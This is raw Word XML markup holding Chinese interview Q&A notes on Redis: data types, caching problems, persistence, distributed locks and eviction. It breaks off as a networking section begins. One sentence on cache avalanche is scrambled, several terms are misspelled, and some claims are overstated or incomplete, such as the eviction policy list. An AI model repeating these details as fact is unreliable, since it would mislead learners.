          <w:numId w:val="20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有哪些常见的功能？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Redis具有丰富的功能，以下是一些常见的功能：</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字符串操作：Redis可以对字符串进行set、get、incr、decr等操作，还支持bit位操作和位图存储。</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哈希表操作：Redis的哈希表可以存储对象属性和值，支持hset、hget、hmset、hmget等操作。</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列表操作：Redis的列表可以存储多个有序元素，支持lpush、rpush、lpop、rpop等操作，还支持阻塞式pop操作和范围查询操作。</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集合操作：Redis的集合可以存储多个无序元素，支持sadd、srem、sismember、scard等操作，还支持集合之间的交集、并集和差集等操作。</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有序集合操作：Redis的有序集合可以存储多个有序元素，支持zadd、zrem、zrange、zrank等操作，还支持有序集合之间的交集、并集和差集等操作。</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发布订阅操作：Redis支持发布订阅模式，可以将消息发布到频道上，订阅者可以从频道上订阅消息并接收到消息通知。</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事务操作：Redis支持事务操作，可以将多个操作封装成一个事务进行执行，保证数据的原子性和一致性。</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Lua脚本支持：Redis支持通过Lua脚本扩展功能，用户可以通过编写Lua脚本实现自定义操作和复杂业务逻辑。</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分布式锁：Redis可以通过SETNX命令实现分布式锁，保证多个进程或线程之间的互斥访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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数据持久化：Redis支持RDB和AOF两种持久化方式，可以将数据存储到磁盘上，保证数据的可靠性和持久性。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综上所述，Redis具有丰富的功能，可以支持字符串操作、哈希表操作、列表操作、集合操作、有序集合操作、发布订阅操作、事务操作、Lua脚本支持、分布式锁和数据持久化等功能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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支持的数据类型有哪些？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Redis支持以下5种主要的数据类型：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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字符串（string）：字符串是Redis最基本的数据类型，可以存储任何类型的数据，包括二进制数据。Redis对字符串的操作包括set、get、incr、decr等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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哈希表（hash）：哈希表是一个string类型的field和value的映射表，一个哈希表可以存储多个field和value，Redis对哈希表的操作包括hset、hget、hmset、hmget等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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列表（list）：列表是一个有序的字符串列表，可以在列表的两端进行push和pop操作，Redis对列表的操作包括lpush、rpush、lpop、rpop等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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集合（set）：集合是一个无序的字符串集合，每个元素都是唯一的，Redis对集合的操作包括sadd、srem、sismember、scard等。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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有序集合（sorted set）：有序集合是一个有序的字符串集合，每个元素都有一个分值（score），可以根据分值进行排序，Redis对有序集合的操作包括zadd、zrem、zrange、zrank等。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除了上述5种数据类型外，Redis还有几种复合数据类型，包括位图（bitmap）、地理位置（geo）和超级日志（hyperloglog）等。同时，Redis还支持二进制安全的字符串操作，可以用于存储和操作二进制数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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为什么这么快？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Redis之所以如此快速，是因为它采用了以下几种优化技术：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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基于内存：Redis的数据存储在内存中，与传统的基于磁盘的数据库不同，它避免了磁盘I/O操作带来的性能瓶颈，因此具有非常高的读写速度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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单线程模型：Redis采用单线程模型，即所有的客户端请求都由一个线程来处理，避免了多线程并发带来的线程切换、锁竞争等开销，提高了处理效率。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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异步IO：Redis采用非阻塞的异步I/O模型，当客户端发送请求后，服务器并不会立即处理请求，而是先将请求放入队列中，然后通过事件轮询机制来处理请求，这样可以充分利用CPU资源，提高系统的并发能力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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数据结构优化：Redis使用了高效的数据结构，例如哈希表、跳表等，这些数据结构能够快速地查找、插入和删除数据，从而提高了Redis的性能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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网络协议优化：Redis采用了自定义的协议，将请求和响应封装在一起，减少了数据的传输次数和传输数据的大小，提高了网络传输效率。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综上所述，Redis之所以如此快速，是因为它采用了基于内存的数据存储、单线程模型、异步I/O、高效的数据结构和网络协议优化等多种优化技术，这些技术的相互协作，使得Redis具有非常高的性能和并发能力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21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什么是缓存穿透？怎么解决？</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缓存穿透指的是当一个缓存中不存在某个被请求的数据时，请求就会穿透缓存直接访问数据库，这样会导致大量的请求直接访问数据库，从而导致数据库的性能瓶颈和崩溃。常见的引起缓存穿透的原因包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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请求的数据本身不存在；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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恶意攻击，例如攻击者有意发送无效的请求；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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数据库中数据被修改或删除。</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为了解决缓存穿透问题，可以采用以下几种方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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布隆过滤器：布隆过滤器是一种空间效率很高的数据结构，可以用来判断一个元素是否在一个集合中。在请求进入系统时，先通过布隆过滤器判断请求的数据是否存在，如果不存在就直接返回，从而避免了无效的数据库访问。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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缓存空对象：当请求的数据不存在时，可以将空对象缓存起来。这样下次请求时，就可以直接从缓存中获取空对象，避免了对数据库的查询操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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数据预热：在系统启动时，将常用的数据预先加载到缓存中。这样可以避免在高并发时大量请求直接访问数据库，从而提高系统的性能和响应速度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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数据库查询加锁：在缓存未命中时，使用数据库查询加锁，从而避免了并发查询时的重复查询和写入，避免了大量的数据库访问和数据冲突。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综上所述，缓存穿透是一种常见的性能问题，可以通过布隆过滤器、缓存空对象、数据预热和数据库查询加锁等方式来解决。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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什么是缓存雪崩？该如何解决？</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缓存雪崩指的是由于缓存中大量的数据同时失效或者某个缓存节点故障，导致大量的请求直接访问数据库，从而导致数据库的性能瓶颈和崩溃。常见的引起缓存雪崩的原因包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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缓存数据的过期时间设置相同：如果缓存数据的过期时间设置相同，那么大量的缓存数据会在同一时刻失效，导致大量的请求直接访问数据库。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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缓存数据的键值设计不合理：如果缓存数据的键值设计不合理，例如使用自增ID作为键值，那么可能会导致大量的缓存数据同时失效。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为了避免缓存雪崩，可以采用以下几种方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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缓存数据的过期时间随机化：将缓存数据的过期时间随机化，从而避免大量的缓存数据在同一时刻失效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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分布式缓存架构：存数据分散到不同的节点上，从而避免单点故障导致采用分布式缓存架构，将缓的雪崩效应。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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消息队列：使用消息队列来控制并发流量，从而避免数据库瞬时高并发的情况。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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热点数据缓存策略：针对重要的热点数据，可以采用单独的缓存策略，例如永不过期或者定期刷新，从而避免热点数据失效导致的缓存雪崩。</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综上所述，缓存雪崩是一种常见的性能问题，可以通过缓存数据的过期时间随机化、分布式缓存架构、消息队列、热点数据缓存策略等方式来解决。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22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怎么保证缓存和数据库数据的一致性？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在使用缓存时，由于缓存是一种内存存储方式，可能会导致缓存中的数据和数据库中的数据不一致的情况。为了保证缓存和数据库数据的一致性，可以采用以下几种方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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先更新数据库再更新缓存：在更新数据时，先更新数据库中的数据，然后再更新缓存中的数据。这样可以确保缓存中的数据和数据库中的数据始终保持一致。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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先删除缓存再更新数据库：在更新数据时，先删除缓存中的数据，然后再更新数据库中的数据。这样可以确保下次访问时，缓存会重新从数据库中加载数据，并将新的数据缓存到内存中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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双写模式：在更新数据时，同时更新数据库和缓存中的数据。这种方式可以保证数据库和缓存中的数据始终保持一致，但是会增加写入的延迟和复杂度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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延时双删模式：在更新数据时，先更新数据库中的数据，然后延迟一段时间后再删除缓存中的数据。这种方式可以保证数据的一致性，同时避免因并发写入导致的性能问题，但是会增加系统的复杂度。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综上所述，为了保证缓存和数据库数据的一致性，可以采用先更新数据库再更新缓存、先删除缓存再更新数据库、双写模式、延时双删模式等方式。不同的方案适用于不同的业务场景，需要根据实际情况进行选择</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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持久化有几种方式？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Redis支持两种不同的持久化方式：快照（snapshotting）和AOF（Append Only File）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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快照持久化（snapshotting）：在一定时间间隔内将Redis在内存中的数据以快照的形式写入到磁盘中。Redis快照可以在Redis中配置，在redis.conf配置文件中可以设置Redis进行快照持久化的方式和时间。快照持久化方式的优点是可以确保在Redis发生故障时可以恢复到最后一次快照时的数据状态，但是可能会存在数据丢失的情况。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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OF持久化：AOF是一种以日志形式记录Redis服务器所执行的写操作命令，Redis会将每次写命令追加到AOF文件中。在Redis重启时，根据AOF文件中的命令重放所有的写操作，从而重新构建数据。与快照持久化方式相比，AOF持久化方式更加安全，可以减少数据的丢失风险，但是AOF文件的大小可能会变得很大，同时AOF方式相对于快照方式会导致Redis的性能略微降低。</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Redis支持快照和AOF两种持久化方式，可以根据实际情况选择不同的方式。快照方式适用于数据变化比较少且Redis重启后能够容忍少量数据丢失的情况；而AOF方式适用于数据变化比较频繁，对数据完整性和稳定性要求较高的情况</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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AOP和RDB各自的优缺点，实际的时候应该怎么样选择</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RDB：Redis DataBase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在指定的时间间隔内将内存中的数据集快照写入磁盘，实际操作过程是fork一个子进程，先将数据集写</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入临时文件，写入成功后，再替换之前的文件，用二进制压缩存储。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1、整个Redis数据库将只包含一个文件 dump.rdb，方便持久化。</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2、容灾性好，方便备份。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3、性能最大化，fork 子进程来完成写操作，让主进程继续处理命令，所以是 IO 最大化。使用单独子进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程来进行持久化，主进程不会进行任何 IO 操作，保证了 redis 的高性能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4.相对于数据集大时，比 AOF 的启动效率更高。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1、数据安全性低。RDB 是间隔一段时间进行持久化，如果持久化之间 redis 发生故障，会发生数据丢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失。所以这种方式更适合数据要求不严谨的时候)</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2、由于RDB是通过fork子进程来协助完成数据持久化工作的，因此，如果当数据集较大时，可能会导</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致整个服务器停止服务几百毫秒，甚至是1秒钟。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AOF：Append Only File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以日志的形式记录服务器所处理的每一个写、删除操作，查询操作不会记录，以文本的方式记录，可以</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打开文件看到详细的操作记录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1、数据安全，Redis中提供了3中同步策略，即每秒同步、每修改同步和不同步。事实上，每秒同步也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是异步完成的，其效率也是非常高的，所差的是一旦系统出现宕机现象，那么这一秒钟之内修改的数据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将会丢失。而每修改同步，我们可以将其视为同步持久化，即每次发生的数据变化都会被立即记录到磁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盘中。。</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2、通过 append 模式写文件，即使中途服务器宕机也不会破坏已经存在的内容，可以通过 redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <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check-aof 工具解决数据一致性问题。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3、AOF 机制的 rewrite 模式。定期对AOF文件进行重写，以达到压缩的目的缺点：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1、AOF 文件比 RDB 文件大，且恢复速度慢。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2、数据集大的时候，比 rdb 启动效率低。</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3、运行效率没有RDB高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AOF文件比RDB更新频率高，优先使用AOF还原数据。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AOF比RDB更安全也更大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RDB性能比AOF好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如果两个都配了优先加载AOF</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实际选择时，可以根据业务场景的不同进行选择。如果数据更新比较频繁，需要保证数据的完整性和可靠性，那么AOF方式可能是更好的选择；如果数据更新比较少，但需要快速地进行数据恢复，那么快照方式可能是更好的选择。如果需要同时使用快照和AOF方式，可以通过配置Redis的持久化方式来实现。可以使用快照方式进行定期备份，同时开启AOF方式以保证数据的完整性和可靠性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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怎么实现分布式锁？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Redis可以通过以下两种方式来实现分布式锁：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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使用SETNX和EXPIRE命令</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ETNX命令可以用于在Redis中设置一个键值对，只有当这个键不存在时才会设置成功。因此，我们可以利用SETNX来实现分布式锁的加锁操作，同时利用EXPIRE命令来设置锁的过期时间，避免锁无限制地占用资源。当获取到锁的客户端在执行完任务后，可以通过DEL命令来删除这个键值对，释放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具体实现代码如下：</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SET resource_name my_random_value NX PX 30000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上述命令中，resource_name是需要锁定的资源名称，my_random_value是一个随机值，可以用来标识当前加锁的客户端。NX表示只有在该键不存在时才能成功设置，PX 30000表示设置该键的过期时间为30秒。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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使用Redlock算法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Redlock是一个分布式锁算法，可以用于在分布式系统中实现可靠的锁。它基于多个Redis实例，并使用一定的时间同步机制，可以避免单点故障和时钟漂移等问题，确保锁的可靠性。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Redlock的具体实现可以参考官方文档：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="25BB9B"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="25BB9B"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://hd.nowcoder.com/link.html?target=https://redis.io/topics/distlock" \t "https://www.nowcoder.com/discuss/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="25BB9B"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="25BB9B"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>https://redis.io/topics/distlock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="25BB9B"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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淘汰策略有哪些？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Redis淘汰策略用于在内存不足时，根据一定的策略选择哪些键需要被淘汰（删除），以释放一些内存空间。Redis提供了多种淘汰策略，包括：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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volatile-lru：从已设置过期时间的键集合中，选择最近最少使用的键进行淘汰。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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volatile-ttl：从已设置过期时间的键集合中，选择剩余过期时间最短的键进行淘汰。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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volatile-random：从已设置过期时间的键集合中，随机选择一个键进行淘汰。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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allkeys-lru：从所有键的集合中，选择最近最少使用的键进行淘汰。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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allkeys-random：从所有键的集合中，随机选择一个键进行淘汰。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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no-eviction：禁止淘汰操作，当内存不足时，Redis命令将会失败或阻塞，直到有足够的内存可用。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策略中，前三个策略只针对设置了过期时间的键，可以用于控制内存使用量。后三个策略则不考虑过期时间，可以用于缓存全局数据。no-eviction策略则直接禁止淘汰，可能导致Redis服务器内存使用过高而崩溃。</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可以通过Redis的配置文件或在运行时使用CONFIG SET命令来设置淘汰策略。例如，以下命令可以将Redis的淘汰策略设置为volatile-lru：</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1ABC9C" w:sz="12" w:space="0"/>
          <w:shd w:val="clear" w:fill="F6F8FA"/>
        </w:rPr>
        <w:t>CONFIG SET maxmemory-policy volatile-lru</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Redis 常见性能问题和解决方案？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Redis在性能方面表现出色，但是在某些情况下可能会出现性能问题，主要原因可能是以下几点：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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频繁的持久化操作：当使用RDB或AOF持久化方式时，频繁的持久化操作可能会导致Redis性能下降。解决方案可以是调整持久化频率，或者使用Redis集群来分散持久化压力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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内存碎片问题：在Redis中，内存碎片会导致内存使用效率低下，从而影响Redis性能。解决方案可以是使用jemalloc或tcmalloc等内存管理库，或者周期性地对Redis进行重启。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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热点数据集中：如果某些键的访问频率非常高，可能会导致Redis性能瓶颈。解决方案可以是将热点数据进行分片存储，或者使用Redis集群来分散数据访问压力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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网络延迟问题：Redis是一个基于网络通信的分布式系统，网络延迟可能会影响Redis性能。解决方案可以是优化网络结构，使用更快速的网络通信协议，或者使用Redis Sentinel和Redis Cluster等工具来实现高可用性和负载均衡。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Redis命令性能问题：某些Redis命令的性能比较低，例如KEYS命令和FLUSHDB命令。解决方案可以是避免使用这些性能较低的命令，或者使用SCAN命令代替KEYS命令进行模糊匹配。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除了上述问题，Redis还可能出现其他性能问题，例如CPU使用率过高、大量客户端连接导致性能下降等。解决这些问题需要根据具体情况进行分析和调优。</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九、计算机网络 45 道</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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为什么需要三次握手？两次不行？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TCP 协议中，进行通信前需要进行“三次握手”（three-way handshake）过程，而不是“两次握手”或者“四次握手”，主要是为了保证通信的可靠性和安全性。具体原因如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
